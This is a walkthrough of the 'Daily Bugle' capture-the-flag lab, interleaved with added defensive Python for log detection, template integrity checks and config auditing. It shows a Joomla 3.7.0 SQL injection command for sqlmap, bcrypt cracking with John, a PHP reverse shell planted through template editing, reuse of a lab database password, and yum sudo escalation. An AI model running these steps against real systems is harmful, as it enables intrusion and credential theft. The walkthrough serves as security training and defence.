Daily Bugle is a fairly hard CTF machine that requires several techniques to solve, so let’s start by accessing it from here.
As always, let’s start with Nmap to enumerate the Daily Bugle machine and see which services are available on our target.
nmap -sV -sC Machine_IP
After the scan finishes, you should get something similar to the following:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 08:55 EDT
Nmap scan report for 10.10.226.51
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.63 seconds
From the results we learn the following:
- an SSH service is running with asymmetric key authentication
- an HTTP service is running, so we can access it from the browser
- there is a robots.txt file, and it reveals multiple directories
- and finally, the CMS in use is Joomla
Let’s start by opening the server in the browser; from the home page we can get the answer to the first question.
Access the web server, who robbed the bank?
There’s nothing more on the home page, so let’s check the source code; there’s nothing important there either.
Let’s check the robots.txt file; there’s nothing there other than the admin login page.
Before we start brute forcing, the next question is about the Joomla version, which you can get by installing a tool called JoomScan that enumerates the Joomla CMS.
First you need to install it (the package name is lowercase) with
sudo apt-get install joomscan
and then we run the tool with the following command:
joomscan -u http://Machine_IP
From the results of the scan, we get the next answer.
What is the Joomla version?
While the tool is scanning (it won’t show anything important that we don’t already know), let’s search exploit-db for any known vulnerability we can use to get inside the CMS.
searchsploit joomla 3.7.0
And what do you know, we have two vulnerabilities, one of them an SQL injection.
Let’s open the link above: the CMS can be confirmed vulnerable with a simple sqlmap command against the home page. You can use this command, but it takes a very long time.
sqlmap -u "http://Machine_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
There’s a hint that we should use a Python script, so I searched online for a Joomla 3.7.0 SQL injection exploit written in Python and found the following script on GitHub.
So let’s get the script
and then run it against our target; you should get something similar to this:
[-] Fetching CSRF token
[-] Testing SQLi
(' - Found table:', 'fb9j5_users')
(' - Extracting users from', 'fb9j5_users')
(' [$] Found user', ['811', 'Super User', 'jonah', 'firstname.lastname@example.org', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', ''])
(' - Extracting sessions from', 'fb9j5_session')
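From the defender’s side, the probe above is easy to spot in the web server’s access log: a Joomla sort parameter (list[fullordering]) should only ever carry a column name and an ASC/DESC direction, so anything else, in particular a SQL function name, is worth an alert. The following is an added example of that detection logic and is not part of the original write-up or of any Joomla tooling; the log lines are constructed (Apache combined format), and the column whitelist regex is an assumption about what legitimate Joomla ordering values look like.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Assumption: a legitimate Joomla ordering value is a column name optionally followed by ASC/DESC.
SAFE_ORDERING = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.IGNORECASE)
# SQL functions that have no business in a sort-order parameter.
SQL_FUNC = re.compile(r'\b(updatexml|extractvalue)\b', re.IGNORECASE)

# Constructed sample log lines (not taken from the machine). The second and third carry the
# list[fullordering] probe from the sqlmap command above, once plain and once URL-encoded;
# the fourth is a normal administrator request sorting a list by column.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2021:08:57:01 -0400] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jun/2021:08:57:03 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 1983 "-" "sqlmap/1.5"
10.0.0.9 - - [12/Jun/2021:08:57:04 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%28%29 HTTP/1.1" 500 2011 "-" "python-requests/2.25"
10.0.0.7 - - [12/Jun/2021:08:57:05 -0400] "GET /administrator/index.php?option=com_fields&view=fields&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""


def ordering_values(target):
    """Return every decoded list[fullordering] value in a request target (parse_qs decodes key and value)."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return params.get('list[fullordering]', [])


def is_suspicious(value):
    """True when the value carries a SQL function or is not a plain column/direction pair."""
    return bool(SQL_FUNC.search(value)) or not SAFE_ORDERING.match(value)


def find_suspicious(log_text):
    """Scan access-log text and return one record per suspicious ordering value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        for value in ordering_values(m.group('target')):
            if is_suspicious(value):
                hits.append({'ip': m.group('ip'), 'time': m.group('ts'), 'value': value,
                             'status': m.group('status'), 'ua': m.group('ua')})
    return hits


if __name__ == '__main__':
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} status={hit['status']} ua={hit['ua']!r} ordering={hit['value']!r}")
```

Decoding the query string before matching matters: the URL-encoded third line would slip past a naive substring search for `list[fullordering]`, and the 500 status codes on the flagged lines are the second signal a SOC analyst would correlate with.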
So we have a user along with a password hash; let’s try to crack the password (a bcrypt hash) with John the Ripper.
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt password_joomla
and we get the next answer:
What is Jonah’s cracked password?
Now let’s log in to the Joomla CMS.
After we log in, we need to upload a reverse shell so we can control the Daily Bugle machine and get the flag.
We know that Joomla runs on PHP, so we need a PHP reverse shell, but Joomla won’t let you upload it, so first we need to allow PHP file uploads.
You can allow that by going to Content -> Media -> Options, where you should see the “Legal Extensions” field; you can also disable “Restrict Uploads” just in case.
But it didn’t work: you can try adding “php” to “Legal Image Extensions” and “Legal MIME Types”, but that didn’t work either.
Another way is to put the code inside the template that runs PHP, so if you go to Extensions -> Templates -> Templates you should get the following.
If you enlarge the images, you can see that the second one is the one in use, so if we replace the index.php file (the one loaded by default for the home page) and then refresh the page, you should get the reverse shell.
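Editing a template’s index.php through the admin UI is exactly the kind of change file integrity monitoring exists to catch: the template directory of a deployed site should not change outside of a release. The snippet below is an added example of a minimal baseline-and-diff check over a Joomla templates tree; it is not part of the original write-up or of Joomla itself. The directory layout and template name (protostar) used in the demo are constructed in a temporary directory.

```python
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map each regular file under root (relative path) to its SHA-256 digest."""
    digests = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            with open(full, 'rb') as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Compare two hash_tree() results and report modified, added and removed paths."""
    return {
        'modified': sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        'added': sorted(p for p in current if p not in baseline),
        'removed': sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed scenario: baseline a templates tree, then simulate a template edit and a dropped file."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, 'templates', 'protostar')  # template name is a constructed example
        os.makedirs(tpl)
        index = os.path.join(tpl, 'index.php')
        with open(index, 'w') as fh:
            fh.write("<?php echo 'site'; ?>\n")
        baseline = hash_tree(root)  # in production this would be stored off-host at deploy time

        # Simulate what the post describes: index.php replaced, plus an extra PHP file appearing.
        with open(index, 'w') as fh:
            fh.write("<?php echo 'changed'; ?>\n")
        with open(os.path.join(tpl, 'extra.php'), 'w') as fh:
            fh.write("<?php ?>\n")
        return diff_baseline(baseline, hash_tree(root))


if __name__ == '__main__':
    for kind, paths in demo().items():
        for p in paths:
            print(f'{kind}: {p}')
```

The baseline has to live somewhere the web server user cannot rewrite, otherwise whoever holds the web shell can simply re-baseline; comparing against the checksums shipped with the Joomla release, or against a copy kept on the monitoring host, is the usual answer.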
After we get access, let’s head to the home folder.
We can see that there’s a user called jjameson, but we don’t have permission to access it, so it’s time for privilege escalation.
If we check which “sudo” permissions we have by using
you can see that we have none, so as always, let’s check the second place, which is the crontab.
There’s nothing there, and we don’t have permission to edit the crontab either:
-rw-r--r--. 1 root root 451 Jun 9 2014 /etc/crontab
Since there’s nothing, let’s check the web server files; maybe there’s something in the configuration.
Let’s check what files we have:
LICENSE.txt README.txt administrator bin cache cli components configuration.php htaccess.txt images includes index.php language layouts libraries media modules plugins robots.txt templates tmp web.config.txt
Let’s check the configuration file.
You should get something similar to this:
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'The Daily Bugle';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';
public $live_site = '';
public $secret = 'UAMBRWzHO3oFPmVC';
public $gzip = '0';
public $error_reporting = 'default';
So we have a password that might work elsewhere: I tried it for the mysql and root users and it didn’t work, then I tried it for jjameson and voilà!
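The two things that made this step work, a database account running as root and a database password shared with a local user, are both things a site owner can check for. Below is an added example of a small auditor for Joomla’s configuration.php (it parses the `public $name = 'value';` lines and evaluates a few hardening rules); it is not from the original write-up or from the Joomla project, and the sample file uses placeholder values rather than the machine’s real secrets. The severity labels and thresholds (12-character password, 16-character secret) are my own assumptions.

```python
import re

# Matches the `public $name = 'value';` lines of a Joomla configuration.php.
CONFIG_RE = re.compile(r"^\s*public\s+\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", re.MULTILINE)

# Constructed sample shaped like the file shown above; the secrets are placeholders.
SAMPLE_CONFIG = """<?php
class JConfig {
    public $sitename = 'The Daily Bugle';
    public $debug = '0';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'PLACEHOLDER_DB_PASSWORD';
    public $db = 'joomla';
    public $dbprefix = 'fb9j5_';
    public $secret = 'PLACEHOLDER_SECRET';
    public $error_reporting = 'default';
}
"""


def parse_joomla_config(text):
    """Return the config as a dict of setting name -> string value."""
    return dict(CONFIG_RE.findall(text))


def audit_joomla_config(cfg):
    """Evaluate hardening rules against a parsed config; returns (severity, message) tuples."""
    findings = []
    password = cfg.get('password', '')
    if cfg.get('user', '') == 'root':
        findings.append(('high', 'database connection runs as root; use a dedicated least-privilege DB account'))
    if not password:
        findings.append(('high', 'empty database password'))
    elif len(password) < 12:  # assumed threshold
        findings.append(('medium', 'database password shorter than 12 characters'))
    if cfg.get('debug') == '1':
        findings.append(('medium', 'debug mode enabled; stack traces and queries may leak to visitors'))
    if cfg.get('error_reporting') == 'maximum':
        findings.append(('low', 'error_reporting=maximum exposes PHP notices to visitors'))
    if len(cfg.get('secret', '')) < 16:  # assumed threshold
        findings.append(('medium', 'site secret shorter than 16 characters'))
    return findings


def audit_config_text(text):
    """Convenience wrapper: parse and audit raw file contents."""
    return audit_joomla_config(parse_joomla_config(text))


if __name__ == '__main__':
    for severity, message in audit_config_text(SAMPLE_CONFIG):
        print(f'[{severity}] {message}')
```

What this cannot check offline is reuse of the database password for an operating-system account; that needs a credential-hygiene process (distinct, generated passwords per service) rather than a static rule, which is the real lesson of this step.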
and we can get our flag by going to the user’s home files.
What is the user flag?
Now it’s time to get root privileges; let’s see which sudo commands we can run by running sudo -l.
So let’s see if we can escalate our privileges with this command by checking GTFOBins.
To escalate our privileges with yum, we have two methods: either create a package and install it (method A), or write a custom plugin (method B).
I’ll go with method B; after it works, you will have the root user, which you can check by running whoami.
What is the root flag?
And finally, we have finished the Daily Bugle machine.